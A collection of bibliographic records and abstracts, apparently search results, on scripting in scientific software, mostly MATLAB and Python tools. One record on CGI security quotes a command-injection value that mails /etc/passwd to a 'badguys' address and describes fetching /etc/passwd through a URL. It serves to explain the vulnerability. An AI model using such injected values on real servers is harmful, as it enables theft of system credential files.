Ullman, Richard; Bane, Bob; Yang, Jingli
2008-01-01
A shell script has been written as a means of automatically making HDF-EOS-formatted data sets available via the World Wide Web. ("HDF-EOS" and variants thereof are defined in the first of the two immediately preceding articles.) The shell script chains together some software tools developed by the Data Usability Group at Goddard Space Flight Center to perform the following actions: Extract metadata in Object Definition Language (ODL) from an HDF-EOS file, Convert the metadata from ODL to Extensible Markup Language (XML), Reformat the XML metadata into human-readable Hypertext Markup Language (HTML), Publish the HTML metadata and the original HDF-EOS file to a Web server and an Open-source Project for a Network Data Access Protocol (OPeN-DAP) server computer, and Reformat the XML metadata and submit the resulting file to the EOS Clearinghouse, which is a Web-based metadata clearinghouse that facilitates searching for, and exchange of, Earth-Science data.
TagDigger: user-friendly extraction of read counts from GBS and RAD-seq data.
Clark, Lindsay V; Sacks, Erik J
2016-01-01
In genotyping-by-sequencing (GBS) and restriction site-associated DNA sequencing (RAD-seq), read depth is important for assessing the quality of genotype calls and estimating allele dosage in polyploids. However, existing pipelines for GBS and RAD-seq do not provide read counts in formats that are both accurate and easy to access. Additionally, although existing pipelines allow previously-mined SNPs to be genotyped on new samples, they do not allow the user to manually specify a subset of loci to examine. Pipelines that do not use a reference genome assign arbitrary names to SNPs, making meta-analysis across projects difficult. We created the software TagDigger, which includes three programs for analyzing GBS and RAD-seq data. The first script, tagdigger_interactive.py, rapidly extracts read counts and genotypes from FASTQ files using user-supplied sets of barcodes and tags. Input and output is in CSV format so that it can be opened by spreadsheet software. Tag sequences can also be imported from the Stacks, TASSEL-GBSv2, TASSEL-UNEAK, or pyRAD pipelines, and a separate file can be imported listing the names of markers to retain. A second script, tag_manager.py, consolidates marker names and sequences across multiple projects. A third script, barcode_splitter.py, assists with preparing FASTQ data for deposit in a public archive by splitting FASTQ files by barcode and generating MD5 checksums for the resulting files. TagDigger is open-source and freely available software written in Python 3. It uses a scalable, rapid search algorithm that can process over 100 million FASTQ reads per hour. TagDigger will run on a laptop with any operating system, does not consume hard drive space with intermediate files, and does not require programming skill to use.
PsyScript: a Macintosh application for scripting experiments.
Bates, Timothy C; D'Oliveiro, Lawrence
2003-11-01
PsyScript is a scriptable application allowing users to describe experiments in Apple's compiled high-level object-oriented AppleScript language, while still supporting millisecond or better within-trial event timing (delays can be in milliseconds or refresh-based, and PsyScript can wait on external I/O, such as eye movement fixations). Because AppleScript is object oriented and system-wide, PsyScript experiments support complex branching, code reuse, and integration with other applications. Included AppleScript-based libraries support file handling and stimulus randomization and sampling, as well as more specialized tasks, such as adaptive testing. Advanced features include support for the BBox serial port button box, as well as a low-cost USB-based digital I/O card for millisecond timing, recording of any number and types of responses within a trial, novel responses, such as graphics tablet drawing, and use of the Macintosh sound facilities to provide an accurate voice key, saving voice responses to disk, scriptable image creation, support for flicker-free animation, and gaze-dependent masking. The application is open source, allowing researchers to enhance the feature set and verify internal functions. Both the application and the source are available for free download at www.maccs.mq.edu.au/-tim/psyscript/.
2013-08-05
preliminary design phase the operational modes defined here will be implemented in MATLAB/Simulink/Stateflow and will be used as a master mission script ...3. the detumble mode during which the nanosat uses the rate gyros of the IMU and its RCS thrusters to cancel the angular rates about each axis...the mode is exited nominally if the angular rate about each axis has been brought below a certain threshold, the largest solar panel has been pointed
2011-06-01
effective way- point navigation algorithm that interfaced with a Java based graphical user interface (GUI), written by Uzun, for a robot named Bender [2...the angular acceleration, θ̈, or angular rate, θ̇. When considering a joint driven by an electric motor, the inertia and friction can be divided into...interactive simulations that can receive input from user controls, scripts , and other applications, such as Excel and MATLAB. One drawback is that the
Loudspeaker equalization for auditory research.
MacDonald, Justin A; Tran, Phuong K
2007-02-01
The equalization of loudspeaker frequency response is necessary to conduct many types of well-controlled auditory experiments. This article introduces a program that includes functions to measure a loudspeaker's frequency response, design equalization filters, and apply the filters to a set of stimuli to be used in an auditory experiment. The filters can compensate for both magnitude and phase distortions introduced by the loudspeaker. A MATLAB script is included in the Appendix to illustrate the details of the equalization algorithm used in the program.
SSC Geopositional Assessment of the Advanced Wide Field Sensor
NASA Technical Reports Server (NTRS)
Ross, Kenton
2007-01-01
The objective is to provide independent verification of IRS geopositional accuracy claims and of the internal geopositional characterization provided by Lutes (2005). Six sub-scenes (quads) were assessed; Three from each AWiFS camera. Check points were manually matched to digital orthophoto quarter quadrangle (DOQQ) reference (assumed accuracy approx. 5 m, RMSE) Check points were selected to meet or exceed Federal Geographic Data Committee's guidelines. Used ESRI ArcGIS for data collection and SSC-written MATLAB scripts for data analysis.
2015-04-23
blade geometry parameters the TPL design 9 tool was initiated by running the MATLAB script (*.m) Main_SpeedLine_Auto. Main_SpeedLine_Auto...SolidWorks for solid model generation of the blade shapes. Computational Analysis With solid models generated of the gas -path air wedge, automated...287 mm (11.3 in) Constrained by existing TCR geometry Number of Passages 12 None A blade tip-down design approach was used. The outputs of the
Developing a Complete and Effective ACT-R Architecture
2008-01-01
of computational primitives , as contrasted with the predominant “one-off” and “grab-bag” cognitive models in the field. These architectures have...transport/ semaphore protocols connected via a glue script. Both protocols rely on the fact that file rename and file remove operations are atomic...the Trial Log file until just prior to processing the next input request. Thus, to perform synchronous identifications it is necessary to run an
Femtosecond laser fabrication of fiber based optofluidic platform for flow cytometry applications
NASA Astrophysics Data System (ADS)
Serhatlioglu, Murat; Elbuken, Caglar; Ortac, Bulend; Solmaz, Mehmet E.
2017-02-01
Miniaturized optofluidic platforms play an important role in bio-analysis, detection and diagnostic applications. The advantages of such miniaturized devices are extremely low sample requirement, low cost development and rapid analysis capabilities. Fused silica is advantageous for optofluidic systems due to properties such as being chemically inert, mechanically stable, and optically transparent to a wide spectrum of light. As a three dimensional manufacturing method, femtosecond laser scanning followed by chemical etching shows great potential to fabricate glass based optofluidic chips. In this study, we demonstrate fabrication of all-fiber based, optofluidic flow cytometer in fused silica glass by femtosecond laser machining. 3D particle focusing was achieved through a straightforward planar chip design with two separately fabricated fused silica glass slides thermally bonded together. Bioparticles in a fluid stream encounter with optical interrogation region specifically designed to allocate 405nm single mode fiber laser source and two multi-mode collection fibers for forward scattering (FSC) and side scattering (SSC) signals detection. Detected signal data collected with oscilloscope and post processed with MATLAB script file. We were able to count number of events over 4000events/sec, and achieve size distribution for 5.95μm monodisperse polystyrene beads using FSC and SSC signals. Our platform shows promise for optical and fluidic miniaturization of flow cytometry systems.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Anderson, Mark A.; Bigelow, Matthew; Gilkey, Jeff C.
The Super Strypi SWIL is a six degree-of-freedom (6DOF) simulation for the Super Strypi Launch Vehicle that includes a subset of the Super Strypi NGC software (guidance, ACS and sequencer). Aerodynamic and propulsive forces, mass properties, ACS (attitude control system) parameters, guidance parameters and Monte-Carlo parameters are defined in input files. Output parameters are saved to a Matlab mat file.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Gardner, S; Gulam, M; Song, K
2014-06-01
Purpose: The Varian EDGE machine is a new stereotactic platform, combining Calypso and VisionRT localization systems with a stereotactic linac. The system includes TrueBeam DeveloperMode, making possible the use of XML-scripting for automation of linac-related tasks. This study details the use of DeveloperMode to automate commissioning tasks for Varian EDGE, thereby improving efficiency and measurement consistency. Methods: XML-scripting was used for various commissioning tasks,including couch model verification,beam-scanning,and isocenter verification. For couch measurements, point measurements were acquired for several field sizes (2×2,4×4,10×10cm{sup 2}) at 42 gantry angles for two couch-models. Measurements were acquired with variations in couch position(rails in/out,couch shifted inmore » each of motion axes) compared to treatment planning system(TPS)-calculated values,which were logged automatically through advanced planning interface(API) scripting functionality. For beam scanning, XML-scripts were used to create custom MLC-apertures. For isocenter verification, XML-scripts were used to automate various Winston-Lutz-type tests. Results: For couch measurements, the time required for each set of angles was approximately 9 minutes. Without scripting, each set required approximately 12 minutes. Automated measurements required only one physicist, while manual measurements required at least two physicists to handle linac positions/beams and data recording. MLC apertures were generated outside of the TPS,and with the .xml file format, double-checking without use of TPS/operator console was possible. Similar time efficiency gains were found for isocenter verification measurements Conclusion: The use of XML scripting in TrueBeam DeveloperMode allows for efficient and accurate data acquisition during commissioning. The efficiency improvement is most pronounced for iterative measurements, exemplified by the time savings for couch modeling measurements(approximately 10 hours). The scripting also allowed for creation of the files in advance without requiring access to TPS. The API scripting functionality enabled efficient creation/mining of TPS data. Finally, automation reduces the potential for human error in entering linac values at the machine console,and the script provides a log of measurements acquired for each session. This research was supported in part by a grant from Varian Medical Systems, Palo Alto, CA.« less
Oostenveld, Robert; Fries, Pascal; Maris, Eric; Schoffelen, Jan-Mathijs
2011-01-01
This paper describes FieldTrip, an open source software package that we developed for the analysis of MEG, EEG, and other electrophysiological data. The software is implemented as a MATLAB toolbox and includes a complete set of consistent and user-friendly high-level functions that allow experimental neuroscientists to analyze experimental data. It includes algorithms for simple and advanced analysis, such as time-frequency analysis using multitapers, source reconstruction using dipoles, distributed sources and beamformers, connectivity analysis, and nonparametric statistical permutation tests at the channel and source level. The implementation as toolbox allows the user to perform elaborate and structured analyses of large data sets using the MATLAB command line and batch scripting. Furthermore, users and developers can easily extend the functionality and implement new algorithms. The modular design facilitates the reuse in other software packages. PMID:21253357
Divergence Measures Tool:An Introduction with Brief Tutorial
2014-03-01
in detecting differences across a wide range of Arabic -language text files (they varied by genre, domain, spelling variation, size, etc.), our...other. 2 These measures have been put to many uses in natural language processing ( NLP ). In the evaluation of machine translation (MT...files uploaded into the tool must be .txt files in ASCII or UTF-8 format. • This tool has been tested on English and Arabic script**, but should
Sridhar, Vishnu B; Tian, Peifang; Dale, Anders M; Devor, Anna; Saisan, Payam A
2014-01-01
We present a database client software-Neurovascular Network Explorer 1.0 (NNE 1.0)-that uses MATLAB(®) based Graphical User Interface (GUI) for interaction with a database of 2-photon single-vessel diameter measurements from our previous publication (Tian et al., 2010). These data are of particular interest for modeling the hemodynamic response. NNE 1.0 is downloaded by the user and then runs either as a MATLAB script or as a standalone program on a Windows platform. The GUI allows browsing the database according to parameters specified by the user, simple manipulation and visualization of the retrieved records (such as averaging and peak-normalization), and export of the results. Further, we provide NNE 1.0 source code. With this source code, the user can database their own experimental results, given the appropriate data structure and naming conventions, and thus share their data in a user-friendly format with other investigators. NNE 1.0 provides an example of seamless and low-cost solution for sharing of experimental data by a regular size neuroscience laboratory and may serve as a general template, facilitating dissemination of biological results and accelerating data-driven modeling approaches.
Hidden markov model for the prediction of transmembrane proteins using MATLAB.
Chaturvedi, Navaneet; Shanker, Sudhanshu; Singh, Vinay Kumar; Sinha, Dhiraj; Pandey, Paras Nath
2011-01-01
Since membranous proteins play a key role in drug targeting therefore transmembrane proteins prediction is active and challenging area of biological sciences. Location based prediction of transmembrane proteins are significant for functional annotation of protein sequences. Hidden markov model based method was widely applied for transmembrane topology prediction. Here we have presented a revised and a better understanding model than an existing one for transmembrane protein prediction. Scripting on MATLAB was built and compiled for parameter estimation of model and applied this model on amino acid sequence to know the transmembrane and its adjacent locations. Estimated model of transmembrane topology was based on TMHMM model architecture. Only 7 super states are defined in the given dataset, which were converted to 96 states on the basis of their length in sequence. Accuracy of the prediction of model was observed about 74 %, is a good enough in the area of transmembrane topology prediction. Therefore we have concluded the hidden markov model plays crucial role in transmembrane helices prediction on MATLAB platform and it could also be useful for drug discovery strategy. The database is available for free at bioinfonavneet@gmail.comvinaysingh@bhu.ac.in.
Entity Resolution Workflow Installation Process and User Guide
2013-07-01
Program Files\\PostgreSQL\\9.1\\data superuser ( postgres ), service account ( postgres ) password : "password" Port #: 5432 Add an environment variable...in this report. • Run the script found in <GG_HOME>\\ globalgraph-dist-1.4.6-final\\schema- ddl\\postgresSetup.bat. This script will set up Postgres ...Username: postgres DB Admin PWD: password GlobalGraph App User: gguser GlobalGraph App PWD: password • Restart the Postgres service using the Windows
DOE Office of Scientific and Technical Information (OSTI.GOV)
Thorne, N; Kassaee, A
Purpose: To develop an algorithm which can calculate the Full Width Half Maximum (FWHM) of a Proton Pencil Beam from a 2D dimensional ion chamber array (IBA Matrixx) with limited spatial resolution ( 7.6 mm inter chamber distance). The algorithm would allow beam FWHM measurements to be taken during daily QA without an appreciable time increase. Methods: Combinations of 147 MeV single spot beams were delivered onto an IBA Matrixx and concurrently on EBT3 films for a standard. Data were collected around the Bragg Peak region and evaluated by a custom MATLAB script based on our algorithm using a leastmore » squared analysis. A set of artificial data, modified with random noise, was also processed to test for robustness. Results: The Matlab script processed Matixx data shows acceptable agreement (within 5%) with film measurements with no single measurement differing by more than 1.8 mm. In cases where the spots show some degree of asymmetry, the algorithm is able to resolve the differences. The algorithm was able to process artificial data with noise up to 15% of the maximum value. Time assays of each measurement took less than 3 minutes to perform, indicating that such measurements may be efficiently added to daily QA treatment. Conclusion: The developed algorithm can be implemented in daily QA program for Proton Pencil Beam scanning beams (PBS) with Matrixx to extract spot size and position information. The developed algorithm may be extended to small field sizes in photon clinic.« less
DOE Office of Scientific and Technical Information (OSTI.GOV)
"rsed" is an R package that contains tools for stream editing: manipulating text files by making insertions, replacements, deletions, substitutions, or commenting. It hails from the powerful Unix command, "sed". While the "rsed" package is not nearly as powerful as "see", it is much simpler to use. R programmers often write scripts that may require simple manipulation of text files. "rsed" addresses that need.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Barnette, Daniel W.
eCo-PylotDB, written completely in Python, provides a script that parses incoming emails and prepares extracted data for submission to a database table. The script extracts the database server, the database table, the server password, and the server username all from the email address to which the email is sent. The database table is specified on the Subject line. Any text in the body of the email is extracted as user comments for the database table. Attached files are extracted as data files with each file submitted to a specified table field but in separate rows of the targeted database table.more » Other information such as sender, date, time, and machine from which the email was sent is extracted and submitted to the database table as well. An email is sent back to the user specifying whether the data from the initial email was accepted or rejected by the database server. If rejected, the return email includes details as to why.« less
Analyzed Boise Data for Oscillatory Hydraulic Tomography
Lim, David
2015-07-01
Data here has been "pre-processed" and "analyzed" from the raw data submitted to the GDR previously (raw data files found at http://gdr.openei.org/submissions/479. doi:10.15121/1176944 after 30 September 2017). First, we submit .mat files which are the "pre-processed" data (must have MATLAB software to use). Secondly, the csv files contain submitted data in its final analyzed form before being used for inversion. Specifically, we have fourier coefficients obtained from Fast Fourier Transform Algorithms.
Nonlinear Meshfree Analysis Program (NMAP) Version 1.0 (User’s Manual)
2012-12-01
divided by the number of time increments used in the analysis . In addition to prescribing total nodal displacements in the neutral file, users are...conditions, the user must define material properties, initial conditions, and a variety of control parameters for the NMAP analysis . These data are provided...a script file. Restart A restart function is provided in the NMAP code, where the user may restart an analysis using a set of restart files. In
Geology of Point Reyes National Seashore and vicinity, California: a digital database
Clark, Jospeh C.; Brabb, Earl E.
1997-01-01
This Open-File report is a digital geologic map database. This pamphlet serves to introduce and describe the digital data. There is no paper map included in the Open-File report. The report does include, however, a PostScript plot file containing an image of the geologic map sheet with explanation, as well as the accompanying text describing the geology of the area. For those interested in a paper plot of information contained in the database or in obtaining the PostScript plot files, please see the section entitled 'For Those Who Aren't Familiar With Digital Geologic Map Databases' below. This digital map database, compiled from previously published and unpublished data and new mapping by the authors, represents the general distribution of surficial deposits and rock units in Point Reyes and surrounding areas. Together with the accompanying text file (pr-geo.txt or pr-geo.ps), it provides current information on the stratigraphy and structural geology of the area covered. The database delineates map units that are identified by general age and lithology following the stratigraphic nomenclature of the U.S. Geological Survey. The scale of the source maps limits the spatial resolution (scale) of the database to 1:48,000 or smaller.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Prather, J. C.; Smith, S. K.; Watson, C. R.
The National Radiobiology Archives is a comprehensive effort to gather, organize, and catalog original data, representative specimens, and supporting materials related to significant radiobiology studies. This provides researchers with information for analyses which compare or combine results of these and other studies and with materials for analysis by advanced molecular biology techniques. This Programmer's Guide document describes the database access software, NRADEMO, and the subset loading script NRADEMO/MAINT/MAINTAIN, which comprise the National Laboratory Archives Distributed Access Package. The guide is intended for use by an experienced database management specialist. It contains information about the physical and logical organization of themore » software and data files. It also contains printouts of all the scripts and associated batch processing files. It is part of a suite of documents published by the National Radiobiology Archives.« less
Jordan, Teresa E.
2015-09-30
This submission of Utilization Analysis data to the Geothermal Data Repository (GDR) node of the National Geothermal Data System (NGDS) is in support of Phase 1 Low Temperature Geothermal Play Fairway Analysis for the Appalachian Basin (project DE-EE0006726). The submission includes data pertinent to the methods and results of an analysis of the Surface Levelized Cost of Heat (SLCOH) for US Census Bureau Places within the study area. This was calculated using a modification of a program called GEOPHIRES, available at http://koenraadbeckers.net/geophires/index.php. The MATLAB modules used in conjunction with GEOPHIRES, the MATLAB data input file, the GEOPHIRES output data file, and an explanation of the software components have been provided. Results of the SLCOH analysis appear on 4 .png image files as mapped risk of heat utilization. For each of the 4 image (.png) files, there is an accompanying georeferenced TIF (.tif) file by the same name. In addition to calculating SLCOH, this Task 4 also identified many sites that may be prospects for use of a geothermal district heating system, based on their size and industry, rather than on the SLCOH. An industry sorted listing of the sites (.xlsx) and a map of these sites plotted as a layer onto different iterations of maps combining the three geological risk factors (Thermal Quality, Natural Reservoir Quality, and Risk of Seismicity) has been provided. In addition to the 6 image (.png) files of the maps in this series, a shape (.shp) file and 7 associated files are included as well. Finally, supporting files (.pdf) describing the utilization analysis methodology and summarizing the anticipated permitting for a deep district heating system are supplied. UPDATE: Newer version of the Utilization Analysis has been added here: https://gdr.openei.org/submissions/878
GPFA-AB_Phase1UtilizationTask4DataUpload
Teresa E. Jordan
2015-09-30
This submission of Utilization Analysis data to the Geothermal Data Repository (GDR) node of the National Geothermal Data System (NGDS) is in support of Phase 1 Low Temperature Geothermal Play Fairway Analysis for the Appalachian Basin (project DE-EE0006726). The submission includes data pertinent to the methods and results of an analysis of the Surface Levelized Cost of Heat (SLCOH) for US Census Bureau ‘Places’ within the study area. This was calculated using a modification of a program called GEOPHIRES, available at http://koenraadbeckers.net/geophires/index.php. The MATLAB modules used in conjunction with GEOPHIRES, the MATLAB data input file, the GEOPHIRES output data file, and an explanation of the software components have been provided. Results of the SLCOH analysis appear on 4 .png image files as mapped ‘risk’ of heat utilization. For each of the 4 image (.png) files, there is an accompanying georeferenced TIF (.tif) file by the same name. In addition to calculating SLCOH, this Task 4 also identified many sites that may be prospects for use of a geothermal district heating system, based on their size and industry, rather than on the SLCOH. An industry sorted listing of the sites (.xlsx) and a map of these sites plotted as a layer onto different iterations of maps combining the three geological risk factors (Thermal Quality, Natural Reservoir Quality, and Risk of Seismicity) has been provided. In addition to the 6 image (.png) files of the maps in this series, a shape (.shp) file and 7 associated files are included as well. Finally, supporting files (.pdf) describing the utilization analysis methodology and summarizing the anticipated permitting for a deep district heating system are supplied.
NASA Astrophysics Data System (ADS)
Huang, Yibin; Zhan, Hongbin; Knappett, Peter S. K.
2018-04-01
Past studies modeling stream-aquifer interaction commonly account for vertical anisotropy in hydraulic conductivity, but rarely address horizontal anisotropy, which may exist in certain sedimentary environments. If present, horizontal anisotropy will greatly impact stream depletion and the amount of recharge a pumped aquifer captures from the river. This scenario requires a different and somewhat more sophisticated mathematical approach to model and interpret pumping test results than previous models used to describe captured recharge from rivers. In this study, a new mathematical model is developed to describe the spatiotemporal distribution of drawdown from stream-bank pumping with a well screened across a horizontally anisotropic, confined aquifer, laterally bounded by a river. This new model is used to estimate four aquifer parameters including the magnitude and directions of major and minor principal transmissivities and storativity based on the observed drawdown-time curves within a minimum of three non-collinear observation wells. In order to approve the efficacy of the new model, a MATLAB script file is programmed to conduct a four-parameter inversion to estimate the four parameters of concern. By comparing the results of analytical and numerical inversions, the accuracy of estimated results from both inversions is acceptable, but the MATLAB program sometimes becomes problematic because of the difficulty of separating the local minima from the global minima. It appears that the new analytical model of this study is applicable and robust in estimating parameter values for a horizontally anisotropic aquifer laterally bounded by a stream. Besides that, the new model calculates stream depletion rate as a function of stream-bank pumping. Unique to horizontally anisotropic and homogeneous aquifers, the stream depletion rate at any given pumping rate depends closely on the horizontal anisotropy ratio and the direction of the principle transmissivities relative to the stream-bank.
Plasma Interactions With Spacecraft (I)
2009-04-01
with the Windows, Red hat LINUX, and MacOS X environments. We wrote N2kScriptRunner, a C++ code that runs a Nascap-2k script outside of the Java ...console-based and with a Java interface), a stand alone program that reads and writes Nascap-2k database files. This program has proved invaluable...surface currents for DSX and prototyped it in Java . A description of the algorithm and the prototype implementation is in Section 3. 1.5. DSX
Inquiry Response Security Issues with CGI Scripting and JAVA Implementations
1998-03-26
that looks like this? nobody@nowhere.com;mail badguys@hell.orgc/etc/ passwd ; Now the open0 statement will evaluate the following command: /usr/lib...sendmail nobody@nowhere.com; mail badguys@hell.orgdetc/ passwd Unintentionally, open0 has mailed the contents of the system password file to the remote...functions outside of the script. For example, the following URL requests a copy of /etc/ passwd from the server machine: http://www.odci.gov/cgi-bin
Courtney, Jane; Woods, Elena; Scholz, Dimitri; Hall, William W; Gautier, Virginie W
2015-01-01
We introduce here MATtrack, an open source MATLAB-based computational platform developed to process multi-Tiff files produced by a photo-conversion time lapse protocol for live cell fluorescent microscopy. MATtrack automatically performs a series of steps required for image processing, including extraction and import of numerical values from Multi-Tiff files, red/green image classification using gating parameters, noise filtering, background extraction, contrast stretching and temporal smoothing. MATtrack also integrates a series of algorithms for quantitative image analysis enabling the construction of mean and standard deviation images, clustering and classification of subcellular regions and injection point approximation. In addition, MATtrack features a simple user interface, which enables monitoring of Fluorescent Signal Intensity in multiple Regions of Interest, over time. The latter encapsulates a region growing method to automatically delineate the contours of Regions of Interest selected by the user, and performs background and regional Average Fluorescence Tracking, and automatic plotting. Finally, MATtrack computes convenient visualization and exploration tools including a migration map, which provides an overview of the protein intracellular trajectories and accumulation areas. In conclusion, MATtrack is an open source MATLAB-based software package tailored to facilitate the analysis and visualization of large data files derived from real-time live cell fluorescent microscopy using photoconvertible proteins. It is flexible, user friendly, compatible with Windows, Mac, and Linux, and a wide range of data acquisition software. MATtrack is freely available for download at eleceng.dit.ie/courtney/MATtrack.zip.
Courtney, Jane; Woods, Elena; Scholz, Dimitri; Hall, William W.; Gautier, Virginie W.
2015-01-01
We introduce here MATtrack, an open source MATLAB-based computational platform developed to process multi-Tiff files produced by a photo-conversion time lapse protocol for live cell fluorescent microscopy. MATtrack automatically performs a series of steps required for image processing, including extraction and import of numerical values from Multi-Tiff files, red/green image classification using gating parameters, noise filtering, background extraction, contrast stretching and temporal smoothing. MATtrack also integrates a series of algorithms for quantitative image analysis enabling the construction of mean and standard deviation images, clustering and classification of subcellular regions and injection point approximation. In addition, MATtrack features a simple user interface, which enables monitoring of Fluorescent Signal Intensity in multiple Regions of Interest, over time. The latter encapsulates a region growing method to automatically delineate the contours of Regions of Interest selected by the user, and performs background and regional Average Fluorescence Tracking, and automatic plotting. Finally, MATtrack computes convenient visualization and exploration tools including a migration map, which provides an overview of the protein intracellular trajectories and accumulation areas. In conclusion, MATtrack is an open source MATLAB-based software package tailored to facilitate the analysis and visualization of large data files derived from real-time live cell fluorescent microscopy using photoconvertible proteins. It is flexible, user friendly, compatible with Windows, Mac, and Linux, and a wide range of data acquisition software. MATtrack is freely available for download at eleceng.dit.ie/courtney/MATtrack.zip. PMID:26485569
Sampling and sensitivity analyses tools (SaSAT) for computational modelling
Hoare, Alexander; Regan, David G; Wilson, David P
2008-01-01
SaSAT (Sampling and Sensitivity Analysis Tools) is a user-friendly software package for applying uncertainty and sensitivity analyses to mathematical and computational models of arbitrary complexity and context. The toolbox is built in Matlab®, a numerical mathematical software package, and utilises algorithms contained in the Matlab® Statistics Toolbox. However, Matlab® is not required to use SaSAT as the software package is provided as an executable file with all the necessary supplementary files. The SaSAT package is also designed to work seamlessly with Microsoft Excel but no functionality is forfeited if that software is not available. A comprehensive suite of tools is provided to enable the following tasks to be easily performed: efficient and equitable sampling of parameter space by various methodologies; calculation of correlation coefficients; regression analysis; factor prioritisation; and graphical output of results, including response surfaces, tornado plots, and scatterplots. Use of SaSAT is exemplified by application to a simple epidemic model. To our knowledge, a number of the methods available in SaSAT for performing sensitivity analyses have not previously been used in epidemiological modelling and their usefulness in this context is demonstrated. PMID:18304361
Super Strypi HWIL 6DOF (Hardware-In-Loop six-degree-of-freedom) Rev. 2175
DOE Office of Scientific and Technical Information (OSTI.GOV)
Gilkey, Jeff C.; Harl, Nathan R.; Kowalchuk, Scott A.
2016-02-23
The Super Strypi HWIL is a six degree-of-freedom (6DOF) simulation for the Super Strypi Launch Vehicle. The simulation is used to test the NGC flight software including the navigation software. Aerodynamic and propulsive forces, mass properties, ACS (attitude control system) parameters are defined in input files. Output parameters are saved to a Matlab mat file.
2010-08-07
51 5.3.2 Abaqus VDLOAD Subroutine ............................................. 55 VI. INTERPRETATION OF RESULTS AND DISCUSSION...VDLOAD SUBROUTINE ........................................................... 91 C. PYTHON SCRIPT TO CONVERT ABAQUS INPUT FILE TO LS-DYNA INPUT FILE...all of the simulations, which are the pressures applied from the Abaqus /Explicit VDLOAD subroutine . The entire model 22 including the boundary
Wilshire, Howard G.; Bedford, David R.; Coleman, Teresa
2002-01-01
3. Plottable map representations of the database at 1:24,000 scale in PostScript and Adobe PDF formats. The plottable files consist of a color geologic map derived from the spatial database, composited with a topographic base map in the form of the USGS Digital Raster Graphic for the map area. Color symbology from each of these datasets is maintained, which can cause plot file sizes to be large.
[Development of a Software for Automatically Generated Contours in Eclipse TPS].
Xie, Zhao; Hu, Jinyou; Zou, Lian; Zhang, Weisha; Zou, Yuxin; Luo, Kelin; Liu, Xiangxiang; Yu, Luxin
2015-03-01
The automatic generation of planning targets and auxiliary contours have achieved in Eclipse TPS 11.0. The scripting language autohotkey was used to develop a software for automatically generated contours in Eclipse TPS. This software is named Contour Auto Margin (CAM), which is composed of operational functions of contours, script generated visualization and script file operations. RESULTS Ten cases in different cancers have separately selected, in Eclipse TPS 11.0 scripts generated by the software could not only automatically generate contours but also do contour post-processing. For different cancers, there was no difference between automatically generated contours and manually created contours. The CAM is a user-friendly and powerful software, and can automatically generated contours fast in Eclipse TPS 11.0. With the help of CAM, it greatly save plan preparation time and improve working efficiency of radiation therapy physicists.
FastScript3D - A Companion to Java 3D
NASA Technical Reports Server (NTRS)
Koenig, Patti
2005-01-01
FastScript3D is a computer program, written in the Java 3D(TM) programming language, that establishes an alternative language that helps users who lack expertise in Java 3D to use Java 3D for constructing three-dimensional (3D)-appearing graphics. The FastScript3D language provides a set of simple, intuitive, one-line text-string commands for creating, controlling, and animating 3D models. The first word in a string is the name of a command; the rest of the string contains the data arguments for the command. The commands can also be used as an aid to learning Java 3D. Developers can extend the language by adding custom text-string commands. The commands can define new 3D objects or load representations of 3D objects from files in formats compatible with such other software systems as X3D. The text strings can be easily integrated into other languages. FastScript3D facilitates communication between scripting languages [which enable programming of hyper-text markup language (HTML) documents to interact with users] and Java 3D. The FastScript3D language can be extended and customized on both the scripting side and the Java 3D side.
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2011 CFR
2011-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2012 CFR
2012-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2013 CFR
2013-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2014 CFR
2014-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
Lessons Learned from Daily Uplink Operations during the Deep Impact Mission
NASA Technical Reports Server (NTRS)
Stehly, Joseph S.
2006-01-01
The daily preparation of uplink products (commands and files) for Deep Impact was as problematic as the final encounter images were spectacular. The operations team was faced with many challenges during the six-month mission to comet Tempel One of the biggest difficulties was that the Deep Impact Flyby and Impactor vehicles necessitated a high volume of uplink products while also utilizing a new uplink file transfer capability. The Jet Propulsion Laboratory (JPL) Multi-Mission Ground Systems and Services (MGSS) Mission Planning and Sequence Team (MPST) had the responsibility of preparing the uplink products for use on the two spacecraft. These responsibilities included processing nearly 15,000 flight products, modeling the states of the spacecraft during all activities for subsystem review, and ensuring that the proper commands and files were uplinked to the spacecraft. To guarantee this transpired and the health and safety of the two spacecraft were not jeopardized several new ground scripts and procedures were developed while the Deep Impact Flyby and Impactor spacecraft were en route to their encounter with Tempel-1. These scripts underwent several adaptations throughout the entire mission up until three days before the separation of the Flyby and Impactor vehicles. The problems presented by Deep Impact's daily operations and the development of scripts and procedures to ease those challenges resulted in several valuable lessons learned. These lessons are now being integrated into the design of current and future MGSS missions at JPL.
DefEX: Hands-On Cyber Defense Exercise for Undergraduate Students
2011-07-01
Injection, and 4) File Upload. Next, the students patched the associated flawed Perl and PHP Hypertext Preprocessor ( PHP ) code. Finally, students...underlying script. The Zora XSS vulnerability existed in a PHP file that echoed unfiltered user input back to the screen. To eliminate the...vulnerability, students filtered the input using the PHP htmlentities function and retested the code. The htmlentities function translates certain ambiguous
General Mission Analysis Tool (GMAT) Acceptance Test Plan [Draft
NASA Technical Reports Server (NTRS)
Dove, Edwin; Hughes, Steve
2007-01-01
